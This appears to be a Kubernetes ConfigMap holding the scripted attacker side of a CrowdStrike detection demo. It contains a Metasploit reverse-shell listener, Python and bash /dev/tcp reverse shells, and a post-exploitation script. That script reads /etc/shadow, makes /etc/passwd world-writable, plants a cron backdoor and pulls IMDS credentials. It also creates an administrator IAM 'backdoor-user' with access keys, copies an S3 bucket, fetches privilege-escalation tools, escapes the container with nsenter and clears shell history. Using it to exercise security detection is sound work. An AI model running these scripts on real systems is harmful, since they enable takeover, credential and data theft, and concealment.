# ConfigMap carrying the scripted "attacker" side of the CrowdStrike demo.
# Every value under `data:` is a script body (Metasploit resource file, shell,
# Python); how they are mounted and invoked is defined outside this file —
# presumably a volume mount in the demo workload, TODO confirm.
# The scripts are the detection triggers, so their content is intentionally
# noisy: recon, persistence via cron, IMDS credential lookup, IAM user
# creation, S3 sync, nsenter into PID 1, and history clearing (see the
# section headers inside post_exploit.template). They mutate /etc/passwd
# permissions and overwrite /etc/crontab in whatever container they run in,
# so that container must be disposable.
apiVersion: v1
kind: ConfigMap
metadata:
  name: demo-attack-scripts
  labels:
    app.kubernetes.io/part-of: crowdstrike-demo
data:
  # Metasploit resource script: starts a multi/handler listener on
  # 0.0.0.0:4444 as a background job, waits 30 s, then exits the console.
  # AutoRunScript points at /home/ubuntu/tradecraft/post_exploit.rc, while
  # this map's key is `post_exploit.template` — presumably rendered to that
  # path by whatever consumes the template; TODO confirm the rename happens.
  startup.rc: |
    # Framework Resource Script for CrowdStrike POV Demo
    use multi/handler
    set payload linux/x64/shell_reverse_tcp
    set LHOST 0.0.0.0
    set LPORT 4444
    set AutoRunScript /home/ubuntu/tradecraft/post_exploit.rc
    exploit -j
    sleep 30
    exit -y
  # Post-exploitation activity run once a session is established. Each
  # stanza below corresponds to a detection the demo expects to fire; the
  # S3 bucket (fcs-cnapp-bucket) and RDS instance (fcs-cnapp-db) are
  # hard-coded demo resource names, and `touch fcs-cnapp-demo` is the
  # trigger for a custom IOA per the script's own comment. The closing
  # `rm -rf`, `history -c` and `unset HISTFILE` lines remove the artifacts
  # the earlier steps created, so detection must rely on telemetry captured
  # at execution time rather than on-disk evidence.
  post_exploit.template: |
    # C2 connections using LABYRINTH CHOLLIMA infrastructure
    nslookup google.com
    ping -c 5 8.8.8.8
    # Install required system utilities
    apt-get update
    apt-get install -y curl unzip wget dnsutils whois git python3 python3-pip procps net-tools nmap netcat-traditional tcpdump
    #some linux noise
    mount -t proc none /proc
    bash crowdstrike_test_high
    cat /etc/shadow
    cat /etc/passwd
    ps -A
    netstat -anlp
    chmod 777 /etc/passwd
    touch /etc/cron.d/rootkit
    echo "* * * * * root /tmp/backdoor" > /etc/crontab
    # Install AWS CLI
    curl https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip -o awscliv2.zip
    unzip -q awscliv2.zip
    ./aws/install --update
    export AWS_PAGER=""
    export PATH=/usr/bin:/usr/local/bin:$PATH
    # Get AWS identity
    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
    aws sts get-caller-identity
    # Create backdoor user
    aws iam create-user --user-name backdoor-user
    aws iam attach-user-policy --user-name backdoor-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user
    aws iam create-access-key --user-name backdoor-user
    # Initial enumeration
    aws s3 ls
    aws rds describe-db-instances --region us-east-1
    # Targeted data theft - S3
    mkdir /tmp/stolen_data
    aws s3 sync s3://fcs-cnapp-bucket /tmp/stolen_data/bucket1/
    # Targeted data theft - RDS
    aws rds describe-db-instances --db-instance-identifier fcs-cnapp-db --region us-east-1
    # Download and execute malware samples
    cd /tmp
    mkdir -p malware
    cd /tmp/malware
    # Privilege escalation tools
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
    # Make tools executable
    chmod +x *.sh
    # Execute tools
    ./lse.sh -l 1 -i -c
    #custom IOA for fusion
    touch fcs-cnapp-demo
    # Container escape demonstration
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami
    nsenter --target 1 --mount --uts --ipc --net --pid -- hostname
    nsenter --target 1 --mount --uts --ipc --net --pid -- pwd
    nsenter --target 1 --mount --uts --ipc --net --pid -- id
    # Return to app directory and cleanup
    cd /app
    rm -rf /tmp/malware /tmp/stolen_data
    history -c
    unset HISTFILE
    # Exit session cleanly
    exit
  # Python client that connects to demo-server.default.svc.cluster.local:4444
  # and attaches a bash pty to the socket. demo-server is presumably the
  # cluster Service fronting the multi/handler started by startup.rc —
  # confirm against the demo's Service manifest. `import subprocess` is
  # unused in the script body.
  connect-demo.py: |
    #!/usr/bin/env python3
    # CrowdStrike Demo Connection Script
    import socket
    import subprocess
    import os
    import pty
    def connect_demo():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("demo-server.default.svc.cluster.local", 4444))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        pty.spawn("/bin/bash")
    if __name__ == "__main__":
        connect_demo()
  # Bash variant of the same connection to the same host and port, using
  # bash's /dev/tcp redirection so it works where python3 is absent.
  connect-demo.sh: |
    #!/bin/bash
    # CrowdStrike Demo Bash Reverse Shell Connection
    # Uses pure bash TCP redirect for more realistic attack pattern
    SERVER_HOST="demo-server.default.svc.cluster.local"
    SERVER_PORT="4444"
    # Establish reverse shell using bash TCP redirect
    /bin/bash -c "exec 5<>/dev/tcp/${SERVER_HOST}/${SERVER_PORT}; cat <&5 | while read line; do \$line 2>&5 >&5; done"